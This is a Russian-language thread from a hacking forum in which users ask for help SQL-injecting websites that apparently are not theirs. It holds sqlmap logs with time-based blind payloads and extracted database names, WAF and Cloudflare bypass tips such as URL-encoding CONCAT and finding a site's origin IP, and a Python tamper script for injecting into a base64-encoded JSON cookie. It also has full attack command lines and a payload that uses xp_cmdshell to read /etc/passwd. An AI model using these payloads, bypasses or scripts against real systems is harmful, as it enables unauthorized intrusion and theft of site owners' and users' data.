• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

[03:16:05] [PAYLOAD] 4522 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
Этот запрос исключительно для детекта WAF на таргете, тамперы не заменяют в нем пейлоад. Это нормально.

[03:19:30] [PAYLOAD] (%A0SELECT %A0CONCAT(0x71766b6271,(%A0ELT(7032=7032,1)),0x716b707a71))
Тут триггер конкретно на CONCAT. Достаточно перевести первую букву в урл энкод %A0%43ONCAT и триггера нет. Че сам то не пробуешь обходить?
 
Этот запрос исключительно для детекта WAF на таргете, тамперы не заменяют в нем пейлоад. Это нормально.


Тут триггер конкретно на CONCAT. Достаточно перевести первую букву в урл энкод %A0%43ONCAT и триггера нет. Че сам то не пробуешь обходить?
та теперь буду знать, я думал что там только, теперь буду знать.
%A0
Спасибо еще раз )
 
сталкнулся с такой проблемой
Код:
POST https://www.site.com/Rare/Nymium?page=2 HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com
Host: www.site.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"

testing@example.com*
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="submit"

submit=
------------YWJkMTQzNDcw--

начала выскакивать got HTTP error code: 403 ('Forbidden')
естественно ничего не раскрутило и не вывело
я подставил тампер --tamper=between , и больше не ттрегерило, до того момента как не дошло до вывода бд но и они вывелись.
Код:
(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 64,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:30] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:30] [PAYLOAD] testing@example.com' AND (SELECT 3315 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 32,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:30] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:30] [PAYLOAD] testing@example.com' AND (SELECT 3315 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 1,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:31] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:31] [INFO] retrieved:
[17:01:31] [DEBUG] performed 3 queries in 1.97 seconds
[17:01:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
available databases [2]:
[*] information_schema
[*] test_db
потом я попробовал --current-db , так как их показало 3, вывело спокойно 3 бд
Код:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"

testing@example.com' AND (SELECT 2942 FROM (SELECT(SLEEP(5)))PDwP) AND 'qtTO'='qtTO
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="submit"

submit=
------------YWJkMTQzNDcw--
---
[17:07:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:07:16] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[17:07:44] [INFO] confirming MySQL
[17:07:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:07:56] [INFO] adjusting time delay to 3 seconds due to good response times
[17:07:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[17:07:56] [INFO] fetching current database
[17:07:56] [INFO] retrieved: testdb_main
current database: 'testdb_main'
[17:12:50] [INFO] fetching database names
[17:12:50] [INFO] fetching number of databases
[17:12:50] [INFO] resumed: 3
[17:12:50] [INFO] resumed: information_schema
[17:12:50] [INFO] resumed: test_db
[17:12:50] [INFO] retrieved: testdb_main_main
available databases [3]:
[*] information_schema
[*] test_db
[*] testdb_main
ну когда дошло дело до таблиц начало трегерить и естественно таблицы оно не вывело

я посмотрел по пейлоду через браузер
Код:
https://www.site.com/Rare/Nymium?page=2 testing@example.com' AND (SELECT 1402 FROM (SELECT(SLEEP(32-(IF(ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6a6f626d61737465726d61676e6574735f6d61696e),1,1)) NOT BETWEEN 0 AND 52,0,32)))))xHft) AND 'jEqx'='jEqx
оно то срабатывает то нет
вот скрин

Cloudflare Ray ID: 7a10306c5ab46781 • Your IP: • Performance & security by Cloudflare
 
сталкнулся с такой проблемой
Код:
POST https://www.site.com/Rare/Nymium?page=2 HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com
Host: www.site.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"

testing@example.com*
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="submit"

submit=
------------YWJkMTQzNDcw--

начала выскакивать got HTTP error code: 403 ('Forbidden')
естественно ничего не раскрутило и не вывело
я подставил тампер --tamper=between , и больше не ттрегерило, до того момента как не дошло до вывода бд но и они вывелись.
Код:
(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 64,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:30] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:30] [PAYLOAD] testing@example.com' AND (SELECT 3315 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 32,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:30] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:30] [PAYLOAD] testing@example.com' AND (SELECT 3315 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 1,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:31] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:31] [INFO] retrieved:
[17:01:31] [DEBUG] performed 3 queries in 1.97 seconds
[17:01:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
available databases [2]:
[*] information_schema
[*] test_db
потом я попробовал --current-db , так как их показало 3, вывело спокойно 3 бд
Код:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"

testing@example.com' AND (SELECT 2942 FROM (SELECT(SLEEP(5)))PDwP) AND 'qtTO'='qtTO
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="submit"

submit=
------------YWJkMTQzNDcw--
---
[17:07:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:07:16] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[17:07:44] [INFO] confirming MySQL
[17:07:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:07:56] [INFO] adjusting time delay to 3 seconds due to good response times
[17:07:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[17:07:56] [INFO] fetching current database
[17:07:56] [INFO] retrieved: testdb_main
current database: 'testdb_main'
[17:12:50] [INFO] fetching database names
[17:12:50] [INFO] fetching number of databases
[17:12:50] [INFO] resumed: 3
[17:12:50] [INFO] resumed: information_schema
[17:12:50] [INFO] resumed: test_db
[17:12:50] [INFO] retrieved: testdb_main_main
available databases [3]:
[*] information_schema
[*] test_db
[*] testdb_main
ну когда дошло дело до таблиц начало трегерить и естественно таблицы оно не вывело

я посмотрел по пейлоду через браузер
Код:
https://www.site.com/Rare/Nymium?page=2 testing@example.com' AND (SELECT 1402 FROM (SELECT(SLEEP(32-(IF(ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6a6f626d61737465726d61676e6574735f6d61696e),1,1)) NOT BETWEEN 0 AND 52,0,32)))))xHft) AND 'jEqx'='jEqx
оно то срабатывает то нет
вот скрин

Cloudflare Ray ID: 7a10306c5ab46781 • Your IP: • Performance & security by Cloudflare
найди ип сайта за клаудом, потом --url="ip/path" ==host="site.com"
 
Возможно ли чекгнуть ключ шудан на баланс счета? ) Сори если офтоп, чат гпт сказала нельзя, но можно же, резве не?
 
Одна из кук представляет собой base64 кодированный JSON, один из элементов JSON'a вроде как уязвим судя ручным тестам, можно как то sqlmap заставить инжектить в определенную точку base64 encoded JSON'а ?
Как инжектиться в base64 encoded parameter я понял, а вот когда параметр это JSON и надо инжектиться в одно из значений понять не могу..
 
Как инжектиться в base64 encoded parameter я понял, а вот когда параметр это JSON и надо инжектиться в одно из значений понять не могу..
https://xss.pro/threads/75306/ оно? или я не понял вопрос?
 
https://xss.pro/threads/75306/ оно? или я не понял вопрос?
Примерно, только JSON в запросе base64 закодирован, я могу что то сделать если мне надо инжектиться куда то в середину данных внутри JSON'а, как я понимаю если я использую --base64 в sqlmap и -p имя_куки то payload'ы пойдут в конец, астекриксом указать точку получается нереально? так как на входе base64 строка..
 
Примерно, только JSON в запросе base64 закодирован, я могу что то сделать если мне надо инжектиться куда то в середину данных внутри JSON'а, как я понимаю если я использую --base64 в sqlmap и -p имя_куки то payload'ы пойдут в конец, астекриксом указать точку получается нереально? так как на входе base64 строка..
В POST данных мап корректно детектит JSON кеем --base64=value, но все равно будет проходить все параметры по очереди и точечно уязвимый параметр ты не укажешь, если данные в base кодировке, Только авто-последовательно или тамперами.
Сносочка: при этом он задает вопрос
it appears that provided value for POST parameter 'param' is JSON deserializable. Do you want to inject inside? [y/N]
потому или не ставим --batch или вместе с ним ставим --answers="deserializable=Y", т.к. по умолчанию он выберет N. Внимательнее нах!

В куках же, стандартными средствами мапа (при кодировке и кее --base64) - ' * ' вставить не получится (у меня не получилось), ибо астерикс и обеликс равнозначен кею -p "testparam", а сами куки это param1, параметр со значениями в них (напр json-cookie=) это param2, точка вставки (напр. {"id":"1","password":"23423423"} ) где бага в ins.point 23423423 - это param3 - как тут указывать параметр в параметре в параметре? ))) Я хз. И даже последовательно (как в POST) он не проходит, а тупо добавляет пэйлоад в конец...

Потому рассмотрим на примере, накостылил))) У нас есть raw запрос к серваку такого вида
POST /random.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; CrOS i686 13.587.48) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1
Cookie: dyfk2_k=;dyfk2_sid=2b19bdb476ccf1fc9ea464948276ac03;dyfk2_u=1;json_cookie=eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzIn0=
Host: site.com
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

bla_bla=hyeta&hyeta=2
где decode json_cookie=eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzIn0= это {"id":"1","password":"23423423"} а бажная ins. point 23423423.
Накдываем тампер:
Python:
#!/usr/bin/env python
import base64

def tamper(payload, **kwargs):
    params = '{"id":"1","password":"23423423%s"}' % payload
    data = base64.b64encode(params.encode('utf-8'))
    return data.decode('utf-8')
если мешает '=' окончание base64, в строке data в конец допиши .replace(b'=',b'') , короче чтоб вышло data = base64.b64encode(params.encode('utf-8')).replace(b'=',b'') Но такое не часто встречал, т.к. мап пробует "и так - и так".
Сохрани /sqlmap/tamper/tampz.py -имя ессно от балды
Теперь идем к raw запросу и в json_cookie=eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzIn0= удаляем base64. Оставляем пусоте значение (т.к. оно "захардкожено" :D в тампере). чтоб вышло
Cookie: dyfk2_k=;dyfk2_sid=2b19bdb476ccf1fc9ea464948276ac03;dyfk2_u=1;json_cookie=
save
Мапу подаем в таком виде
-r path/to/raw_file -p "json_cookie" --tamper=tampz --force-ssl --level=4 --risk=3 --dbms=mysql -v 3 --batch --answers="implementation=N"
ну и сотальные кеи, которые юзаешь дописывай.
Вывод -v 3
[19:32:29] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzKSBBTkQgMzQ4MD05NTcwLS0gQk9ieiJ9
[19:32:34] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzKSBBTkQgNjc3Mz02NzczLS0gT2VBUiJ9
[19:32:38] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzKSBBTkQgNDMwOD0yMzk0LS0gdmVsZiJ9
[19:32:43] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzJykgQU5EIDYxMjY9ODk1OS0tIHNFekgifQ==
[19:32:47] [WARNING] reflective value(s) found and filtering out
[19:32:48] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzJykgQU5EIDY3NzM9Njc3My0tIGpOdVkifQ==
[19:32:50] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzJykgQU5EIDYxNTY9Mjg0Ny0tIEdzRnoifQ==
[19:32:52] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzJyBBTkQgOTgwMz05Njk2LS0gcEp5byJ9
[19:32:55] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzJyBBTkQgNjc3Mz02NzczLS0ga0FxQyJ9
[19:32:58] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzJyBBTkQgMTQyNT0xMDA1LS0gdG9rTyJ9
[19:33:01] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzKSBBTkQgODk5Mz05MDEyIEFORCAoNTczOT01NzM5In0=
[19:33:03] [DEBUG] setting match ratio for current parameter to 0.972
[19:33:04] [PAYLOAD] eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzKSBBTkQgNjc3Mz02NzczIEFORCAoMjE1Nz0yMTU3In0=
decode this
{"id":"1","password":"23423423) AND 3480=9570-- BObz"}
{"id":"1","password":"23423423) AND 6773=6773-- OeAR"}
{"id":"1","password":"23423423) AND 4308=2394-- velf"}
{"id":"1","password":"23423423') AND 6126=8959-- sEzH"}
{"id":"1","password":"23423423') AND 6773=6773-- jNuY"}
{"id":"1","password":"23423423') AND 6156=2847-- GsFz"}
{"id":"1","password":"23423423' AND 9803=9696-- pJyo"}
{"id":"1","password":"23423423' AND 6773=6773-- kAqC"}
{"id":"1","password":"23423423' AND 1425=1005-- tokO"}
{"id":"1","password":"23423423) AND 8993=9012 AND (5739=5739"}
{"id":"1","password":"23423423) AND 6773=6773 AND (2157=2157"}

Соответственно, тебе остается только в тампере подставить свои данные, и вставить %s в любое (уязвимое) место JSON, середина это, начало, конец - роли не играет.

P.S. В числовых значениях кавычки не указываются, это я натупил, т.к. показал просто пример , а редачить уже лень
 
Последнее редактирование:
В куках же, стандартными средствами мапа (при кодировке и кее --base64) - ' * ' вставить не получится (у меня не получилось), ибо астерикс и обеликс равнозначен кею -p "testparam", а сами куки это param1, параметр со значениями в них (напр json-cookie=) это param2, точка вставки (напр. {"id":"1","password":"23423423"} ) где бага в ins.point 23423423 - это param3 - как тут указывать параметр в параметре в параметре? ))) Я хз. И даже последовательно (как в POST) он не проходит, а тупо добавляет пэйлоад в конец...
Мессага от овнера мапа:
Currently there is no way how to do the Base64 encoding of JSON value inside the Cookie nor there is a plan to support it (in near future).
 
Возможно ли чекгнуть ключ шудан на баланс счета? ) Сори если офтоп, чат гпт сказала нельзя, но можно же, резве не?
https://api.shodan[.]io/api-info?key=твой_ключ
 
Возможно ли чекгнуть ключ шудан на баланс счета? ) Сори если офтоп, чат гпт сказала нельзя, но можно же, резве не?
Можешь даже пачками чекать:
 
подскажите можно ли как то на это повлиять ?
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Код:
[05:28:56] [ERROR] invalid character detected. retrying..
[05:28:56] [WARNING] increasing time delay to 4 seconds
e
[05:30:03] [ERROR] invalid character detected. retrying..
[05:30:03] [WARNING] increasing time delay to 5 seconds
[05:30:55] [ERROR] invalid character detected. retrying..
[05:30:55] [WARNING] increasing time delay to 6 seconds
[05:32:35] [ERROR] invalid character detected. retrying..
[05:32:35] [WARNING] increasing time delay to 7 seconds
[05:33:03] [ERROR] invalid character detected. retrying..
[05:33:03] [WARNING] increasing time delay to 8 seconds
[05:33:34] [ERROR] invalid character detected. retrying..
[05:33:34] [WARNING] increasing time delay to 9 seconds
[05:34:07] [ERROR] unable to properly validate last character value ('')..
  ed
[05:35:16] [ERROR] invalid character detected. retrying..
[05:35:16] [WARNING] increasing time delay to 4 seconds
_users
[05:38:58] [INFO] retrieved: dbp_
[05:40:24] [ERROR] invalid character detected. retrying..
[05:40:24] [WARNING] increasing time delay to 5 seconds
notification_u

пробовал менять --threads=
не помогло
если бы оно сливало нормлаьно то ладно еще, через время начинается
resumed: 13?3
или вообще начинает пропускать
resumed:
resumed:
resumed:
resumed:
 

Desoxyn

c0d3x

помогите
Скрытый контент для пользователей: Desoxyn.


из инструмента щас только мап под рукой найдено окунем.берпа нет щас.по -v3 не совсем понятные ответы и разные всегда.тип тоже мап видит бд разный постоянно
 
Последнее редактирование:

Desoxyn

c0d3x

помогите

из инструмента щас только мап под рукой найдено окунем.берпа нет щас.по -v3 не совсем понятные ответы и разные всегда.тип тоже мап видит бд разный постоянно
А че конкретно помочь? GET /download/?ref=1'"&testAndroid=1 HTTP/1.1
после в ref=1 * поставь вместо '"
Т.е. в файл засунь так
Скрытый контент для пользователей: sql-dump.

в мап вбей
-r path/to/file/sql.txt --force-ssl --level=4 --risk=3 --dbms=mysql -o
ну и какие ты там кем еще юзаешь, прокси, рандом агент, тайм сек я хз. В чем конкретно проблема? У тебя точка вставки некорректно указана.
 
А че конкретно помочь? GET /download/?ref=1'"&testAndroid=1 HTTP/1.1
после в ref=1 * поставь вместо '"
Т.е. в файл засунь так
делал примерно так только у меня были еще лишние параметры,поставил опять в мап о результате отпишу в теме,ты просто составил команду или попробывал в мапе?
 
делал примерно так только у меня были еще лишние параметры,поставил опять в мап о результате отпишу в теме,ты просто составил команду или попробывал в мапе?
Я не пробовал в мапе, т.к. не раскручиваю чужие таргеты и по чужим уязвимостям не хожу.. Я могу посоветовать, основываясь на той инфе, что ты предоставил Тем более не вижу конкретного вопроса, где ошибка и что не так.
Если не получится, пиши, где именно лажа возникает.
 
Последнее редактирование:
делал примерно так только у меня были еще лишние параметры,поставил опять в мап о результате отпишу в теме,ты просто составил команду или попробывал в мапе?
Бро я как понял, ты просто не указал мапе, место куда нужно пейлоад вставлять.
 
Бро я как понял, ты просто не указал мапе, место куда нужно пейлоад вставлять.
все указывал щас также без изменений все.

Desoxyn

Скрытый контент для пользователей: Desoxyn.
 
Можно переименовать тему

" Ваши Вопросы for Desoxyn&c0d3x "​

 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх